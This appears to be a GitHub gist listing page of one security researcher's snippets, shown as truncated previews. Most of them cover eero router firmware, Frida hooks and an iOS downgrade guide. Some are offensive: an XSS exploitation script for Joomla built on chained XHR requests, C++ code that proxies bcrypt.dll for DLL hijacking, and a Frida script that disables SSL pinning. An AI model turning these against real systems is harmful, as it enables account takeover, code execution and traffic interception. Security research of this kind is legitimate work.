@markuta
markuta / motd.sh
Created June 16, 2024 17:57
Message of the day from eero device firmware
#!/bin/sh
_motd(){
cat << 'EOF'
_____
_-- --_
/ ___ \
welcome to / -- -- \
___ ___ _ __ ___ / ___ \___
/ _ \/ _ \ '__/ _ \ / _ \/ __/
@markuta
markuta / resolvers.txt
Created March 1, 2024 16:40
A list of public DNS resolvers.
@markuta
markuta / networking.js
Created December 8, 2023 20:46 — forked from zihadmahiuddin/networking.js
A Frida script for native networking functions (getaddrinfo, connect, send and recv)
console.log("Loading script...");
var getaddrinfoPtr = Module.findExportByName(null, 'getaddrinfo')
var connectPtr = Module.findExportByName(null, 'connect')
var sendPtr = Module.findExportByName(null, 'send')
var recvPtr = Module.findExportByName(null, 'recv')
var getaddrinfoFunction = new NativeFunction(getaddrinfoPtr, 'int', ['pointer', 'pointer', 'pointer', 'pointer'])
var connectFunction = new NativeFunction(connectPtr, 'int', ['int', 'pointer', 'int'])
var sendFunction = new NativeFunction(sendPtr, 'int', ['int', 'pointer', 'int', 'int'])
@markuta
markuta / frida-struct-pointer-pointer.js
Created December 8, 2023 19:27 — forked from schirrmacher/frida-struct-pointer-pointer.js
Frida: How to read a struct or a struct pointer or a pointer of a struct pointer?
/*
typedef struct {
int size;
char* data;
} test_struct;
void some_func(test_struct **s);
@markuta
markuta / httponly.js
Last active October 31, 2023 11:39
Exploiting XSS with HTTPOnly type Cookies
// Source: https://www.shorebreaksecurity.com/blog/xss-exploitation-with-xhr-response-chaining/
// This is a modified example from the above link. It is used for Joomla
try {
var site = "http://localhost:8080";
// Create an XHR object for each request
var csrf = new XMLHttpRequest();
var user = new XMLHttpRequest();
//var role = new XMLHttpRequest();
@markuta
markuta / serial.log
Created June 13, 2023 23:35
eero 6 (gen 3) boot log
Format: Log Type - Time(microsec) - Message - Optional Info
Log Type: B - Since Boot(Power On Reset), D - Delta, S - Statistic
S - QC_IMAGE_VERSION_STRING=BOOT.XF.0.3-00089-IPQ60xxLZB-2
S - IMAGE_VARIANT_STRING=IPQ6018LA
S - OEM_IMAGE_VERSION_STRING=crm-ubuntu20
S - Boot Interface: eMMC
S - Secure Boot: On
S - Boot Config @ 0x000a602c = 0x000002e3
S - JTAG ID @ 0x000a607c = 0x001390e1
@markuta
markuta / fake-bcrypt.cpp
Last active May 15, 2023 17:45
Sample C++ code for DLL hijacking/proxying using bcrypt.dll
#include "pch.h"
/* Forward All Bcrypt.dll exports */
#pragma comment(linker, "/export:BCryptAddContextFunction=C:\\windows\\system32\\bcrypt.BCryptAddContextFunction,@1")
#pragma comment(linker, "/export:BCryptAddContextFunctionProvider=C:\\windows\\system32\\bcrypt.BCryptAddContextFunctionProvider,@2")
#pragma comment(linker, "/export:BCryptCloseAlgorithmProvider=C:\\windows\\system32\\bcrypt.BCryptCloseAlgorithmProvider,@3")
#pragma comment(linker, "/export:BCryptConfigureContext=C:\\windows\\system32\\bcrypt.BCryptConfigureContext,@4")
#pragma comment(linker, "/export:BCryptConfigureContextFunction=C:\\windows\\system32\\bcrypt.BCryptConfigureContextFunction,@5")
#pragma comment(linker, "/export:BCryptCreateContext=C:\\windows\\system32\\bcrypt.BCryptCreateContext,@6")
#pragma comment(linker, "/export:BCryptCreateHash=C:\\windows\\system32\\bcrypt.BCryptCreateHash,@7")
@markuta
markuta / checkm8_downgrade.md
Created January 1, 2023 12:28
How to downgrade checkm8 devices from iOS 15/16

Important: Please don't use the comment section to ask for help, I most likely won't respond there as I have it muted due to too many notifications. Join r/jailbreak (#genius-bar) or FDR Bureau (#futurerestore-support) instead.

This is a guide for downgrading (or upgrading) to unsigned versions with futurerestore on checkm8 devices (A11 and below). You must have blobs for the version you want to go to, and SEP/BB compatibility may limit how far you can go.

Current SEP compatibility

The latest SEP/BB as of right now is iOS 16.0, which is INCOMPATIBLE with anything below. On devices that got iOS 16, you must use 15.6 RC SEP/BB.

@markuta
markuta / unpin.js
Created December 27, 2022 21:54 — forked from JJTech0130/unpin.js
Disable SSL pinning using Frida
// Disables SSL pinning by replacing functions with no-ops.
function unpin() {
var SecTrustEvaluate_handle = Module.findExportByName('Security', 'SecTrustEvaluate');
var SecTrustEvaluateWithError_handle = Module.findExportByName('Security', 'SecTrustEvaluateWithError');
var SSL_CTX_set_custom_verify_handle = Module.findExportByName('libboringssl.dylib', 'SSL_CTX_set_custom_verify');
var SSL_get_psk_identity_handle = Module.findExportByName('libboringssl.dylib', 'SSL_get_psk_identity');
var boringssl_context_set_verify_mode_handle = Module.findExportByName('libboringssl.dylib', 'boringssl_context_set_verify_mode');
if (SecTrustEvaluateWithError_handle) {
var SecTrustEvaluateWithError = new NativeFunction(SecTrustEvaluateWithError_handle, 'int', ['pointer', 'pointer']);